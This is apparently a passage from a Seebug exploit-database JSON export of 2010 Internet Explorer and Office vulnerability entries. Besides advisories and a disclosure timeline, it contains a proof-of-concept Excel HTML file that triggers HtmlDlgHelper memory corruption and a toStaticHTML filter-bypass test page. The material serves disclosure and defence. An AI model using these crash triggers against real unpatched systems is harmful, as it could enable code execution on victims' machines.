"bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3329"], "modified": "2010-10-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20169", "id": "SSV:20169", "sourceData": "\n <html xmlns:v="urn:schemas-microsoft-com:vml"\r\nxmlns:o="urn:schemas-microsoft-com:office:office"\r\nxmlns:x="urn:schemas-microsoft-com:office:excel">\r\n\r\n<head>\r\n<meta http-equiv=Content-Type content="text/html; charset=windows-1252">\r\n<meta name=ProgId content=Excel.Sheet>\r\n<meta name=Generator content="Microsoft Excel 10">\r\n<!--[if !mso]>\r\n<style>\r\nv\\:* {behavior:url(#default#VML);}\r\no\\:* {behavior:url(#default#VML);}\r\nx\\:* {behavior:url(#default#VML);}\r\n.shape {behavior:url(#default#VML);}\r\n</style>\r\n<![endif]--><!--[if gte mso 9]><xml>\r\n<o:DocumentProperties>\r\n <o:LastAuthor>TEST</o:LastAuthor>\r\n <o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>\r\n <o:Version>10.6858</o:Version>\r\n</o:DocumentProperties>\r\n<o:OfficeDocumentSettings>\r\n <o:DownloadComponents/>\r\n </o:OfficeDocumentSettings>\r\n</xml><![endif]-->\r\n\r\n<!--[if gte mso 9]><xml>\r\n<x:ExcelWorkbook>\r\n <x:ExcelWorksheets>\r\n <x:ExcelWorksheet>\r\n <x:Name>test</x:Name>\r\n <x:WorksheetOptions>\r\n <x:CodeName>Sheet1</x:CodeName>\r\n <x:Selected/>\r\n <x:DoNotDisplayGridlines/>\r\n <x:ProtectContents>False</x:ProtectContents>\r\n <x:ProtectObjects>False</x:ProtectObjects>\r\n <x:ProtectScenarios>False</x:ProtectScenarios>\r\n </x:WorksheetOptions>\r\n </x:ExcelWorksheet>\r\n </x:ExcelWorksheets>\r\n <x:WindowHeight>9345</x:WindowHeight>\r\n <x:WindowWidth>13260</x:WindowWidth>\r\n <x:WindowTopX>240</x:WindowTopX>\r\n <x:WindowTopY>60</x:WindowTopY>\r\n <x:ProtectStructure>False</x:ProtectStructure>\r\n <x:ProtectWindows>False</x:ProtectWindows>\r\n</x:ExcelWorkbook>\r\n</xml><![endif]--><!--[if gte mso 9]><xml>\r\n<o:shapedefaults v:ext="edit" spidmax="1026"/>\r\n</xml><![endif]--><!--[if gte mso 9]><xml>\r\n<o:shapelayout v:ext="edit">\r\n <o:idmap v:ext="edit" data="1"/>\r\n</o:shapelayout></xml><![endif]-->\r\n</head>\r\n\r\n<body link=blue vlink=purple>\r\n\r\n<table x:str border=0 cellpadding=0 cellspacing=0 width=64 style='border-collapse:\r\ncollapse;table-layout:fixed;width:48pt'>\r\n<col width=64 style='width:48pt'>\r\n<tr height=17 style='height:12.75pt'>\r\n <td height=17 width=64 style='height:12.75pt;width:48pt' align=left\r\n valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201" coordsize="21600,21600"\r\n o:spt="201" path="m,l,21600r21600,l21600,xe">\r\n <v:stroke joinstyle="miter"/>\r\n <v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"\r\n o:connecttype="rect"/>\r\n <o:lock v:ext="edit" shapetype="t"/>\r\n </v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201" style='position:absolute;\r\n margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'\r\n strokecolor="windowText [64]" o:insetmode="auto">\r\n <![if gte mso 9]><o:title=""/>\r\n <![endif]><x:ClientData ObjectType="Pict">\r\n <x:SizeWithCells/>\r\n <x:CF>Pict</x:CF>\r\n <x:AutoPict/>\r\n </x:ClientData>\r\n </v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;\r\n position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;\r\n height:17px'><![endif]>\r\n\r\n<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>\r\n\r\n<![if !vml]></span><![endif]><span\r\n style='mso-ignore:vglayout2'>\r\n <table cellpadding=0 cellspacing=0>\r\n <tr>\r\n <td height=17 width=64 style='height:12.75pt;width:48pt'></td>\r\n </tr>\r\n </table>\r\n </span></td>\r\n</tr>\r\n<![if supportMisalignedColumns]>\r\n<tr height=0 style='display:none'>\r\n <td width=64 style='width:48pt'></td>\r\n</tr>\r\n<![endif]>\r\n</table>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20169", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:08:04", "description": "BUGTRAQ ID: 43695\r\nCVE ID: CVE-2010-0808\r\n\r\nInternet Explorer\u662fWindows\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u9ed8\u8ba4\u6346\u7ed1\u7684WEB\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer\u5141\u8bb8\u81ea\u52a8\u7684\u811a\u672c\u5316\u6307\u4ee4\u5728\u81ea\u52a8\u5b8c\u6210\u529f\u80fd\u4e2d\u6a21\u62df\u7528\u6237\u64cd\u4f5c\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u521b\u5efa\u7279\u5236\u7684\u7f51\u9875\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5982\u679c\u7528\u6237\u67e5\u770b\u4e86\u8be5\u7f51\u9875\u5c31\u4f1a\u5bfc\u81f4\u4fe1\u606f\u6cc4\u9732\u3002\u6210\u529f\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u6355\u83b7\u5728\u542f\u7528\u4e86\u81ea\u52a8\u5b8c\u6210\u529f\u80fd\u540e\u66fe\u7ecf\u6240\u8f93\u5165\u5b57\u6bb5\u7684\u4fe1\u606f\u3002\n\nMicrosoft Internet Explorer 7.0\r\nMicrosoft Internet Explorer 6.0\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5c06Internet Explorer\u914d\u7f6e\u4e3a\u5728Internet\u548c\u672c\u5730Intranet\u5b89\u5168\u533a\u57df\u4e2d\u8fd0\u884cActiveX\u63a7\u4ef6\u548c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u8fdb\u884c\u63d0\u793a\u3002\r\n \r\n* \u5c06Internet \u548c\u672c\u5730Intranet\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u8bbe\u4e3a\u201c\u9ad8\u201d\uff0c\u4ee5\u4fbf\u5728\u8fd9\u4e9b\u533a\u57df\u4e2d\u8fd0\u884cActiveX\u63a7\u4ef6\u548c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u8fdb\u884c\u63d0\u793a\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-071\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-071\uff1aCumulative Security Update for Internet Explorer (2360131)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true", "published": "2010-10-15T00:00:00", "type": "seebug", "title": "Microsoft IE\u81ea\u52a8\u5b8c\u6210\u529f\u80fd\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\uff08MS10-071\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0808"], "modified": "2010-10-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20165", "id": "SSV:20165", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:12:31", "description": "BUGTRAQ ID: 43709\r\nCVE ID: CVE-2010-3330\r\n\r\nInternet Explorer\u662fWindows\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u9ed8\u8ba4\u6346\u7ed1\u7684WEB\u6d4f\u89c8\u5668\u3002\r\n\r\n\u5728\u67d0\u4e9b\u8fc7\u7a0b\u4e2d\uff0cInternet Explorer\u9519\u8bef\u7684\u5141\u8bb8\u811a\u672c\u8bbf\u95ee\u548c\u8bfb\u53d6\u5176\u4ed6\u57df\u7684\u5185\u5bb9\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u521b\u5efa\u7279\u5236\u7f51\u9875\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5982\u679c\u7528\u6237\u67e5\u770b\u4e86\u8be5\u7f51\u9875\u5c31\u4f1a\u5bfc\u81f4\u4fe1\u606f\u6cc4\u9732\u3002\r\n\n\nMicrosoft Internet Explorer 8.0\r\nMicrosoft Internet Explorer 7.0\r\nMicrosoft Internet Explorer 6.0\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4ee5\u7eaf\u6587\u672c\u8bfb\u53d6\u90ae\u4ef6\u3002\r\n \r\n* \u5c06Internet Explorer\u914d\u7f6e\u4e3a\u5728Internet\u548c\u672c\u5730Intranet\u5b89\u5168\u533a\u57df\u4e2d\u8fd0\u884cActiveX\u63a7\u4ef6\u548c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u8fdb\u884c\u63d0\u793a\u3002\r\n \r\n* \u5c06Internet\u548c\u672c\u5730Intranet\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u8bbe\u4e3a\u201c\u9ad8\u201d\uff0c\u4ee5\u4fbf\u5728\u8fd9\u4e9b\u533a\u57df\u4e2d\u8fd0\u884cActiveX\u63a7\u4ef6\u548c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u8fdb\u884c\u63d0\u793a\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-071\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-071\uff1aCumulative Security Update for Internet Explorer (2360131)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true", "published": "2010-10-15T00:00:00", "type": "seebug", "title": "Microsoft IE\u8de8\u57df\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\uff08MS10-071\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3330"], "modified": "2010-10-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20168", "id": "SSV:20168", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:08:10", "description": "BUGTRAQ ID: 42467\r\nCVE(CAN) ID: CVE-2010-3324\r\n\r\nInternet Explorer\u662fWindows\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u9ed8\u8ba4\u6346\u7ed1\u7684web\u6d4f\u89c8\u5668\u3002\r\n\r\nIE8\u4e2d\u5bf9\u7a97\u53e3\u5bf9\u8c61\u63d0\u4f9b\u4e86\u540d\u4e3atoStaticHTML\u7684\u8fc7\u6ee4\u65b9\u5f0f\u3002\u5982\u679c\u5411\u8fd9\u4e2a\u51fd\u6570\u4f20\u9001\u4e86HTML\u5b57\u7b26\u4e32\uff0c\u5728\u8fd4\u56de\u4e4b\u524d\u4f1a\u5220\u9664\u6240\u6709\u53ef\u6267\u884c\u7684\u811a\u672c\u7ed3\u6784\u3002\u4f8b\u5982\uff0c\u53ef\u4f7f\u7528toStaticHTML\u65b9\u5f0f\u786e\u4fdd\u4ecepostMessage\u8c03\u7528\u6240\u63a5\u6536\u5230\u7684HTML\u65e0\u6cd5\u6267\u884c\u811a\u672c\uff0c\u4f46\u53ef\u5229\u7528\u57fa\u672c\u683c\u5f0f\uff1a\r\n\r\ndocument.attachEvent('onmessage',function(e) {\r\nif (e.domain == 'weather.example.com') {\r\nspnWeather.innerHTML = window.toStaticHTML(e.data);\r\n}\r\n}\r\n\r\n\u8c03\u7528\uff1a\r\n\r\nwindow.toStaticHTML("This is some <b>HTML</b> with embedded script following... <script>alert('bang!');</script>!");\r\n\r\n\u4f1a\u8fd4\u56de\uff1a\r\n\r\nThis is some <b>HTML</b> with embedded script following... !\n\nMicrosoft Internet Explorer 8.0\r\nMicrosoft Windows SharePoint Services 3.0 sp2\r\nMicrosoft SharePoint Server 2007 SP2\r\nMicrosoft SharePoint Foundation 2010\r\nMicrosoft Office Web Apps\r\nMicrosoft Groove Server 2010\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4ee5\u7eaf\u6587\u672c\u8bfb\u53d6\u90ae\u4ef6\u3002\r\n \r\n* \u5c06Internet Explorer\u914d\u7f6e\u4e3a\u5728Internet\u548c\u672c\u5730Intranet\u5b89\u5168\u533a\u57df\u4e2d\u8fd0\u884cActiveX\u63a7\u4ef6\u548c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u8fdb\u884c\u63d0\u793a\u3002\r\n \r\n* \u5c06Internet \u548c\u672c\u5730Intranet\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u8bbe\u4e3a\u201c\u9ad8\u201d\uff0c\u4ee5\u4fbf\u5728\u8fd9\u4e9b\u533a\u57df\u4e2d\u8fd0\u884cActiveX\u63a7\u4ef6\u548c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u8fdb\u884c\u63d0\u793a\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-071\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-071\uff1aCumulative Security Update for Internet Explorer (2360131)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true", "cvss3": {}, "published": "2010-10-14T00:00:00", "type": "seebug", "title": "Microsoft IE 8 toStaticHTML()\u51fd\u6570\u4e0d\u5b89\u5168HTML\u8fc7\u6ee4\u6f0f\u6d1e(MS10-071/MS10-072)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3324"], "modified": "2010-10-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20163", "id": "SSV:20163", "sourceData": "\n <script type="text/javascript">\r\nfunction fuckie()\r\n{\r\nvar szInput = document.shit.input.value;\r\nvar szStaticHTML = toStaticHTML(szInput);\r\n\r\nResultComment = szStaticHTML;\r\ndocument.shit.output.value = ResultComment;\r\n}\r\n</script>\r\n\r\n<form name="shit">\r\n<textarea name='input' cols=40 rows=20>\r\n</textarea>\r\n<textarea name='output' cols=40 rows=20>\r\n</textarea>\r\n\r\n<input type=button value="fuck_me" name="fuck" onclick=fuckie();>\r\n</form>\r\n\r\n\r\n<style>\r\n\r\n}@import url('//127.0.0.1/1.css');aaa\r\n\r\n{;}\r\n\r\n</style>\r\n<div id="x">Fuck Ie</div>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20163", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T18:13:41", "description": "No description provided by source.", "cvss3": {}, "published": "2010-10-17T00:00:00", "title": "Microsoft Office HtmlDlgHelper Class Memory Corruption", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3329"], "modified": "2010-10-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20184", "id": "SSV:20184", "sourceData": "\n Core Security Technologies - CoreLabs Advisory\r\n http://corelabs.coresecurity.com\r\n \r\n Microsoft Office HtmlDlgHelper class memory corruption\r\n \r\n \r\n1. *Advisory Information*\r\n \r\nTitle: Microsoft Office HtmlDlgHelper class memory corruption\r\nAdvisory Id: CORE-2010-0517\r\nAdvisory URL:\r\n[http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption]\r\nDate published: 2010-10-12\r\nDate of last update: 2010-10-14\r\nVendors contacted: Microsoft\r\nRelease mode: Coordinated release\r\n \r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Missing Initialization [CWE-456]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2010-3329\r\nBugtraq ID: N/A\r\n \r\n \r\n3. *Vulnerability Description*\r\n \r\nMicrosoft Windows is prone to a memory corruption vulnerability when\r\ninstantiating the 'HtmlDlgHelper Class Object' in a Microsoft Office\r\nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of\r\nInternet Explorer ('mshtmled.dll'). This vulnerability could be used by\r\na remote attacker to execute arbitrary code with the privileges of the\r\nuser that opened the malicious file.\r\n \r\n \r\n4. *Vulnerable packages*\r\n \r\n . IE 6\r\n . IE 7\r\n . IE 8\r\n . MS Office XP\r\n . MS Office 2003\r\n . MS Office 2007 and MS Office 2010 (the control is disabled by default)\r\n \r\n \r\n5. *Non-vulnerable packages*\r\n \r\n . For further information and patches about this issue look at the\r\nMicrosoft Security Bulletin Summary for October 2010 [1], patch ms10-071.\r\n \r\n \r\n6. *Credits*\r\n \r\nThis vulnerability was discovered by Damian Frizza from Core Security\r\nTechnologies.\r\n \r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\nMicrosoft Windows is prone to a memory corruption vulnerability when\r\ninstantiating the 'HtmlDlgHelper Class Object'\r\n('CLASSID:3050f4e1-98b5-11cf-bb82-00aa00bdce0b') in a Microsoft Office\r\nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of\r\nInternet Explorer ('mshtmled.dll'). The vulnerability occurs in\r\n'mshtmled.dll' when the destructor of the 'CHtmlDlgHelper' class is\r\ncalled and then makes access to uninitialized memory.\r\n \r\nThe ActiveX control is marked as "Not Safe for Initialization", and\r\nprompts the user with: "ActiveX controls might contain viruses or other\r\nsecurity hazards. Do not enable this content unless you trust the source\r\nof this file". However, in Office 2003 the bug is triggered even if the\r\nuser answers "No" to the prompt.\r\n \r\nThe following code is where the vulnerability occurs, when opening a\r\n.XLS document on Microsoft Office Excel 2003 ('mshtmled.dll'\r\nv8.0.6001.18702):\r\n \r\n/-----\r\nmshtmled!ReleaseInterface:\r\n42b919c0 8bff mov edi,edi\r\n42b919c2 55 push ebp\r\n42b919c3 8bec mov ebp,esp\r\n42b919c5 8b4508 mov eax,dword ptr [ebp+8]\r\nss:0023:0013d104=00310065\r\n42b919c8 85c0 test eax,eax\r\n42b919ca 7406 je mshtmled!ReleaseInterface+0x12\r\n(42b919d2) [br=0]\r\n42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065\r\n42b919ce 50 push eax\r\n42b919cf ff5108 call dword ptr [ecx+8] \r\nds:0023:7d02029c=2a2c277a\r\n \r\neax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc\r\nedi=00000000\r\neip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \r\nefl=00000206\r\n \r\nStack Trace:\r\n<Unloaded_ion.dll>+0x2a2c2779\r\nmshtmled!ReleaseInterface+0x12\r\nmshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10\r\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting\r\ndestructor'+0xd\r\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27\r\nVBE6!rtcStrConvVar+0xbd65\r\nVBE6!rtcSetDatabaseLcid+0xa823\r\nEXCEL!Ordinal41+0xd2ad0\r\nEXCEL!Ordinal41+0x14082a\r\nUSER32!CallWindowProcW+0x1b\r\nInstruction Address: 0x000000002a2c277a\r\n-----/\r\n \r\n \r\nThe following html code demonstrates the bug on Excel 2002/2003. Save\r\nthe file as .XLS and open it on Excel.\r\n \r\n/-----\r\n<html xmlns:v="urn:schemas-microsoft-com:vml"\r\nxmlns:o="urn:schemas-microsoft-com:office:office"\r\nxmlns:x="urn:schemas-microsoft-com:office:excel">\r\n \r\n<head>\r\n<meta http-equiv=Content-Type content="text/html; charset=windows-1252">\r\n<meta name=ProgId content=Excel.Sheet>\r\n<meta name=Generator content="Microsoft Excel 10">\r\n<!--[if !mso]>\r\n<style>\r\nv\\:* {behavior:url(#default#VML);}\r\no\\:* {behavior:url(#default#VML);}\r\nx\\:* {behavior:url(#default#VML);}\r\n.shape {behavior:url(#default#VML);}\r\n</style>\r\n<![endif]--><!--[if gte mso 9]><xml>\r\n <o:DocumentProperties>\r\n <o:LastAuthor>TEST</o:LastAuthor>\r\n <o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>\r\n <o:Version>10.6858</o:Version>\r\n </o:DocumentProperties>\r\n <o:OfficeDocumentSettings>\r\n <o:DownloadComponents/>\r\n </o:OfficeDocumentSettings>\r\n</xml><![endif]-->\r\n \r\n<!--[if gte mso 9]><xml>\r\n <x:ExcelWorkbook>\r\n <x:ExcelWorksheets>\r\n <x:ExcelWorksheet>\r\n <x:Name>test</x:Name>\r\n <x:WorksheetOptions>\r\n <x:CodeName>Sheet1</x:CodeName>\r\n <x:Selected/>\r\n <x:DoNotDisplayGridlines/>\r\n <x:ProtectContents>False</x:ProtectContents>\r\n <x:ProtectObjects>False</x:ProtectObjects>\r\n <x:ProtectScenarios>False</x:ProtectScenarios>\r\n </x:WorksheetOptions>\r\n </x:ExcelWorksheet>\r\n </x:ExcelWorksheets>\r\n <x:WindowHeight>9345</x:WindowHeight>\r\n <x:WindowWidth>13260</x:WindowWidth>\r\n <x:WindowTopX>240</x:WindowTopX>\r\n <x:WindowTopY>60</x:WindowTopY>\r\n <x:ProtectStructure>False</x:ProtectStructure>\r\n <x:ProtectWindows>False</x:ProtectWindows>\r\n </x:ExcelWorkbook>\r\n</xml><![endif]--><!--[if gte mso 9]><xml>\r\n <o:shapedefaults v:ext="edit" spidmax="1026"/>\r\n</xml><![endif]--><!--[if gte mso 9]><xml>\r\n <o:shapelayout v:ext="edit">\r\n <o:idmap v:ext="edit" data="1"/>\r\n </o:shapelayout></xml><![endif]-->\r\n</head>\r\n \r\n<body link=blue vlink=purple>\r\n \r\n<table x:str border=0 cellpadding=0 cellspacing=0 width=64\r\nstyle='border-collapse:\r\n collapse;table-layout:fixed;width:48pt'>\r\n <col width=64 style='width:48pt'>\r\n <tr height=17 style='height:12.75pt'>\r\n <td height=17 width=64 style='height:12.75pt;width:48pt' align=left\r\n valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201"\r\ncoordsize="21600,21600"\r\n o:spt="201" path="m,l,21600r21600,l21600,xe">\r\n <v:stroke joinstyle="miter"/>\r\n <v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"\r\n o:connecttype="rect"/>\r\n <o:lock v:ext="edit" shapetype="t"/>\r\n </v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201"\r\nstyle='position:absolute;\r\n margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'\r\n strokecolor="windowText [64]" o:insetmode="auto">\r\n <![if gte mso 9]><o:title=""/>\r\n <![endif]><x:ClientData ObjectType="Pict">\r\n <x:SizeWithCells/>\r\n <x:CF>Pict</x:CF>\r\n <x:AutoPict/>\r\n </x:ClientData>\r\n </v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;\r\n position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;\r\n height:17px'><![endif]>\r\n \r\n<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B"\r\nid=obj></object>\r\n \r\n<![if !vml]></span><![endif]><span\r\n style='mso-ignore:vglayout2'>\r\n <table cellpadding=0 cellspacing=0>\r\n <tr>\r\n <td height=17 width=64 style='height:12.75pt;width:48pt'></td>\r\n </tr>\r\n </table>\r\n </span></td>\r\n </tr>\r\n <![if supportMisalignedColumns]>\r\n <tr height=0 style='display:none'>\r\n <td width=64 style='width:48pt'></td>\r\n </tr>\r\n <![endif]>\r\n</table>\r\n</body>\r\n</html>\r\n \r\n-----/\r\n \r\n \r\nThis exploitable condition was reproduced in the following versions of\r\n'mshtmled.dll':\r\n \r\n . 'mshtmled.dll' v8.0.6001.18702\r\n . 'mshtmled.dll' v8.0.6001.18000\r\n . 'mshtmled.dll' v7.0.6000.17023\r\n . 'mshtmled.dll' v7.0.6000.17080\r\n \r\n \r\n8. *Report Timeline*\r\n \r\n. 2010-05-28:\r\nInitial notification to the vendor. Draft advisory and proof-of-concept\r\nfiles sent to MSRC. Publication date set for July 13, 2010.\r\n \r\n. 2010-06-11:\r\nCore requests from the vendor an update on the status of this case.\r\n \r\n. 2010-06-14:\r\nThe vendor responds that its engineers are still investigating this\r\nissue; and that they expect to have more information from the\r\ninvestigation and triage process within the next few days.\r\n \r\n. 2010-06-15:\r\nThe vendors informs that they have been determined that the ActiveX\r\ncontrol is marked as "Not Safe for Initialization"; and prompts the user\r\nwith a dialog that warns the user that they are going to be executing a\r\npotentially malicious code. In consequence, the vendor treats this case\r\nas the same scenario as a user that tries to enable and open an Office\r\ndocument with a Macro or VBA code contained within.\r\n \r\n. 2010-06-15:\r\nCore asks the vendor if the previous mail means that it does not intent\r\nto fix the bug or that it does not recognize it as a security issue. The\r\nreporter's viewpoint is that a dialog prompt is not a fix "per se" and\r\njust a defense in depth mechanism; and that he would prefer to see the\r\nbug fixed rather than relying on mitigations that prevent exploitation.\r\n \r\n. 2010-06-15:\r\nCore adds the following information: in Office 2003 even if the user\r\nanswers No to the ActiveX dialog, the application ends up crashing.\r\n \r\n. 2010-06-16:\r\nVendor responds that it is currently investigating the new information.\r\n \r\n. 2010-06-28:\r\nVendor informs that it has found that the vulnerable code actually\r\nexists and is owned by the IE team whom is currently investigating the\r\ncrash; and that this case is transferred over to them (and to a new case\r\nmanager as well).\r\n \r\n. 2010-07-02:\r\nVendor informs Core that the IE team has finished the investigation into\r\nthis issue and was able to reproduce the issue reported. During the\r\ninvestigation it was determined that this is an exploitable crash in\r\nInternet Explorer. Vendor will send Core the list of affected Internet\r\nExplorer versions when available.\r\n \r\n. 2010-07-02:\r\nCore acknowledges receipt of the update, and reminds that although the\r\nvulnerable code is owned by the IE team this also affects Office\r\n(including 2010). Core offers to postpone publication of its advisory\r\nfrom July 13th to August 10th on the basis of a firm commitment to a\r\nrelease date from the vendor's side. Core informs that it is evaluating\r\nthe possibility of using Office killbit recently introduced by MS10-036\r\nas a workaround, but that MS10-036 points to a knowledge base article\r\n[2] that is no longer available.\r\n \r\n. 2010-07-07:\r\nVendor acknowledges previous mail, and states that it will determine\r\nwith the product team how this fix could be included in the August\r\nrelease. Vendor requests an updated version of the advisory, and to\r\ninclude a vendor statement.\r\n \r\n. 2010-07-22:\r\nCore requests an update on the status of the vulnerability report; and\r\ninforms that publication of its advisory has been rescheduled to August\r\n10, 2010, despite the fact that Core did not receive any updates. Core\r\ninforms that the publication of this advisory is transferred to a new\r\ncase manager.\r\n \r\n. 2010-08-04:\r\nCore sends an updated version of the advisory and also asks if MSRC can\r\nprovide:\r\n 1. The list of affected software versions.\r\n 2. The CVE number assigned to this vulnerability (if it exists).\r\n 3. The steps to reproduce the vulnerability in IE [3].\r\n 4. The link to the knowledge base article about the newly introduced\r\nOffice killbit given that Core is investigating using that defense\r\nmechanism as a workaround but MS10-036 points to a knowledge base\r\narticle that is no longer available\r\n([http://support.microsoft.com/kb/983632]).\r\n \r\n Core also notifies this advisory is currently scheduled to be published\r\non August 10, 2010 but the publication can be reviewed if Microsoft\r\nresponds with a firm commitment to a release date of fixes, and\r\ntechnical information about the root cause of this vulnerability.\r\n \r\n. 2010-08-04:\r\nMSRC responds that the updated advisory draft was internally forwarded\r\nand they are working on collecting answers to the requested questions.\r\n \r\n. 2010-08-05:\r\nMSRC sends the answers to the asked questions:\r\n 1. The affected versions of Internet Explorer are IE6 [4], IE7 and IE8.\r\n 2. MSRC is unable to assign a CVE as it is too early. CVEs are\r\ntypically assigned closer to the scheduled release date and MSRC will\r\nreceive the block of CVEs from Mitre for the October release of the\r\nInternet Explorer security update.\r\n 3. MSRC notifies there is no attack vector in IE, and they cannot\r\nprovide steps to reproduce the vulnerability in IE.\r\n 4. The knowledge base article about the newly introduced Office\r\nkillbit was redirected to [http://support.microsoft.com/kb/2252664].\r\n \r\n. 2010-08-06:\r\nCore asks MSRC to clarify if the fix for this issue has been scheduled\r\nto be released in October.\r\n \r\n. 2010-08-06:\r\nMSRC confirms that the fix for this issue is scheduled for the October\r\nrelease of IE.\r\n \r\n. 2010-08-09:\r\nCore re-schedules the publication of the advisory for October 12 and\r\nnotifies that this date should be considered as final, if Microsoft does\r\nnot release fixes on that date, the advisory will be released as 'user\r\nrelease'.\r\n \r\n. 2010-08-09:\r\nMSRC confirms that the fix for this issue is scheduled for the October\r\nrelease of IE.\r\n \r\n. 2010-10-01:\r\nMSRC provides a status update about this issue and notifies that it is\r\nslated to be included in the October release of the IE Cumulative Update\r\nand SafeHTML update scheduled for October 12, 2010. MSRC also notifies\r\nthat the CVE assigned to this issue is CVE-2010-3329.\r\n \r\n. 2010-10-01:\r\nMSRC notifies that they have made a mistake and included an invalid\r\ndetail in the last status update. In particular, the issue does not\r\naffect the SafeHTML update scheduled 